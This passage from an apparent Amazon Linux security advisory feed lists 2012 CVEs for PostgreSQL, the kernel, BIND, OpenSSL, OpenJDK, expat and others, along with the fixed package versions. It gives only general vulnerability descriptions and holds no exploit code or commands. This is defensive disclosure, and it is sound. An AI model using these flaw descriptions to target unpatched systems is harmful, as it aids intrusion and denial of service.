CREATE TRIGGER in PostgreSQL 8.3.x before 8.3.18, 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before 9.1.3 does not properly check the execute permission for trigger functions marked SECURITY DEFINER, which allows remote authenticated users to execute otherwise restricted triggers on arbitrary data by installing the trigger on an attacker-owned table.
CREATE TRIGGER did not do a permissions check on the trigger function to be called. This could possibly allow an authenticated database user to call a privileged trigger function on data of their choosing.
797222:
CVE-2012-0866 postgresql: Absent permission checks on trigger function to be called when creating a trigger
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0866" title="" id="CVE-2012-0866" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0867" title="" id="CVE-2012-0867" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0868" title="" id="CVE-2012-0868" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0678.html" title="" id="RHSA-2012:0678" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql8-libs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.11-1.34.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-83</id><title>Amazon Linux - ALAS-2012-83: medium priority package update for kernel</title><issued date="2012-06-10 11:46:00" /><updated date="2014-09-14 16:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2136:
The sock_alloc_send_pskb function in net/core/sock.c in the Linux kernel before 3.4.5 does not properly validate a certain length value, which allows local users to cause a denial of service (heap-based buffer overflow and system crash) or possibly gain privileges by leveraging access to a TUN/TAP device.
816289:
CVE-2012-2136 kernel: net: insufficient data_len validation in sock_alloc_send_pskb()
* It was found that the data_len parameter of the sock_alloc_send_pskb() function in the Linux kernel's networking implementation was not validated before use. A privileged guest user in a KVM guest could use this flaw to crash the host or, possibly, escalate their privileges on the host.
* It was found that the data_len parameter of the sock_alloc_send_pskb() function in the Linux kernel's networking implementation was not validated before use. A local user with access to a TUN/TAP virtual interface could use this flaw to crash the system or, potentially, escalate their privileges. Note that unprivileged users cannot access TUN/TAP devices until the root user grants them access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2136" title="" id="CVE-2012-2136" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0690.html" title="" id="RHSA-2012:0690" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.19-1.28.6.amzn1.noarch.rpm</filename></package><package name="kernel-headers" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-84</id><title>Amazon Linux - ALAS-2012-84: important priority package update for bind</title><issued date="2012-06-10 11:47:00" /><updated date="2014-09-14 16:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1667:
ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
A flaw was found in the way BIND handled zero length resource data records. A malicious owner of a DNS domain could use this flaw to create specially-crafted DNS resource records that would cause a recursive resolver or secondary server to crash or, possibly, disclose portions of its memory.
828078:
CVE-2012-1667 bind: handling of zero length rdata can cause named to terminate unexpectedly
CVE-2012-1033:
The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack.
A flaw was found in the way BIND handled the updating of cached name server (NS) resource records. A malicious owner of a DNS domain could use this flaw to keep the domain resolvable by the BIND server even after the delegation was removed from the parent DNS zone. With this update, BIND limits the time-to-live of the replacement record to that of the time-to-live of the record being replaced.
788650:
CVE-2012-1033 bind: deleted domain name resolving flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1033" title="" id="CVE-2012-1033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1667" title="" id="CVE-2012-1667" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0716.html" title="" id="RHSA-2012:0716" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind-chroot" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-85</id><title>Amazon Linux - ALAS-2012-85: medium priority package update for openssl</title><issued date="2012-06-10 11:48:00" /><updated date="2014-09-14 16:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2333:
Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and 1.0.1 before 1.0.1c, when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation.
An integer underflow flaw, leading to a buffer over-read, was found in the way OpenSSL handled DTLS (Datagram Transport Layer Security) application data record lengths when using a block cipher in CBC (cipher-block chaining) mode. A malicious DTLS client or server could use this flaw to crash its DTLS connection peer.
820686:
CVE-2012-2333 openssl: record length handling integer underflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2333" title="" id="CVE-2012-2333" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0699.html" title="" id="RHSA-2012:0699" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-static" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-static-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-86</id><title>Amazon Linux - ALAS-2012-86: medium priority package update for python-crypto</title><issued date="2012-06-11 10:27:00" /><updated date="2014-09-14 16:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2417:
825162:
CVE-2012-2417 python-crypto: Insecure ElGamal key generation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2417" title="" id="CVE-2012-2417" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python-crypto" version="2.3" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-2.3-6.5.amzn1.i686.rpm</filename></package><package name="python-crypto-debuginfo" version="2.3" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.3-6.5.amzn1.i686.rpm</filename></package><package name="python-crypto-debuginfo" version="2.3" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.3-6.5.amzn1.x86_64.rpm</filename></package><package name="python-crypto" version="2.3" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-2.3-6.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-87</id><title>Amazon Linux - ALAS-2012-87: medium priority package update for socat</title><issued date="2012-06-11 10:28:00" /><updated date="2014-09-14 16:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0219:
821552:
CVE-2012-0219 socat: heap-based buffer overflow flaw leads to arbitrary code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0219" title="" id="CVE-2012-0219" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="socat-debuginfo" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/socat-debuginfo-1.7.2.1-1.6.amzn1.i686.rpm</filename></package><package name="socat" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/socat-1.7.2.1-1.6.amzn1.i686.rpm</filename></package><package name="socat" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-1.7.2.1-1.6.amzn1.x86_64.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-debuginfo-1.7.2.1-1.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-88</id><title>Amazon Linux - ALAS-2012-88: important priority package update for java-1.6.0-openjdk</title><issued date="2012-06-19 15:58:00" /><updated date="2014-09-14 16:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1724:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, and 6 update 32 and earlier, allows remote attackers to affect availability, related to JAXP.
It was discovered that the Java XML parser did not properly handle certain XML documents. An attacker able to make a Java application parse a specially-crafted XML file could use this flaw to make the XML parser enter an infinite loop.
829374:
CVE-2012-1724 OpenJDK: XML parsing infinite loop (JAXP, 7157609)
CVE-2012-1723:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Multiple flaws were found in the way the Java HotSpot Virtual Machine verified the bytecode of the class file to be executed. A specially-crafted Java application or applet could use these flaws to crash the Java Virtual Machine, or bypass Java sandbox restrictions.
829373:
CVE-2012-1723 OpenJDK: insufficient field accessibility checks (HotSpot, 7152811)
CVE-2012-1718:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect availability via unknown vectors related to Security.
It was discovered that the Java security classes did not properly handle Certificate Revocation Lists (CRL). CRL containing entries with duplicate certificate serial numbers could have been ignored.
829372:
CVE-2012-1718 OpenJDK: CRL and certificate extensions handling improvements (Security, 7143872)
CVE-2012-1717:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows local users to affect confidentiality via unknown vectors related to printing on Solaris or Linux.
It was discovered that various classes of the Java Runtime library could create temporary files with insecure permissions. A local attacker could use this flaw to gain access to the content of such temporary files.
829358:
CVE-2012-1717 OpenJDK: insecure temporary file permissions (JRE, 7143606)
CVE-2012-1716:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, and 5 update 35 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
It was discovered that the SynthLookAndFeel class from Swing did not properly prevent access to certain UI elements from outside the current application context. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine, or bypass Java sandbox restrictions.
829360:
CVE-2012-1716 OpenJDK: SynthLookAndFeel application context bypass (Swing, 7143614)
CVE-2012-1713:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, 1.4.2_37 and earlier, and JavaFX 2.1 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section.
Multiple flaws were discovered in the font manager's layout lookup implementation. A specially-crafted font file could cause the Java Virtual Machine to crash or, possibly, execute arbitrary code with the privileges of the user running the virtual machine.
829361:
CVE-2012-1713 OpenJDK: fontmanager layout lookup code memory corruption (2D, 7143617)
CVE-2012-1711:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to CORBA.
Multiple flaws were discovered in the CORBA (Common Object Request Broker Architecture) implementation in Java. A malicious Java application or applet could use these flaws to bypass Java sandbox restrictions or modify immutable object data.
829354:
CVE-2012-1711 OpenJDK: improper protection of CORBA data models (CORBA, 7079902)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1711" title="" id="CVE-2012-1711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1713" title="" id="CVE-2012-1713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1716" title="" id="CVE-2012-1716" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1717" title="" id="CVE-2012-1717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1718" title="" id="CVE-2012-1718" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723" title="" id="CVE-2012-1723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1724" title="" id="CVE-2012-1724" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0729.html" title="" id="RHSA-2012:0729" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-89</id><title>Amazon Linux - ALAS-2012-89: medium priority package update for expat</title><issued date="2012-06-19 15:59:00" /><updated date="2014-09-14 16:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1148:
Memory leak in the poolGrow function in expat/lib/xmlparse.c in expat before 2.1.0 allows context-dependent attackers to cause a denial of service (memory consumption) via a large number of crafted XML files that cause improperly-handled reallocation failures when expanding entities.
A memory leak flaw was found in Expat. If an XML file processed by an application linked against Expat triggered a memory re-allocation failure, Expat failed to free the previously allocated memory. This could cause the application to exit unexpectedly or crash when all available memory is exhausted.
801648:
CVE-2012-1148 expat: Memory leak in poolGrow
CVE-2012-0876:
The XML parser (xmlparse.c) in expat before 2.1.0 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via an XML file with many identifiers with the same value.
A denial of service flaw was found in the implementation of hash arrays in Expat. An attacker could use this flaw to make an application using Expat consume an excessive amount of CPU time by providing a specially-crafted XML file that triggers multiple hash function collisions. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions.
786617:
CVE-2012-0876 expat: hash table collisions CPU usage DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0876" title="" id="CVE-2012-0876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1148" title="" id="CVE-2012-1148" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0731.html" title="" id="RHSA-2012:0731" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="expat-devel" version="2.0.1" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.0.1-11.9.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.0.1" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.0.1-11.9.amzn1.i686.rpm</filename></package><package name="expat" version="2.0.1" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.0.1-11.9.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.0.1" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.0.1-11.9.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.0.1" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.0.1-11.9.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.0.1" release="11.9.amzn1" epoch="0" 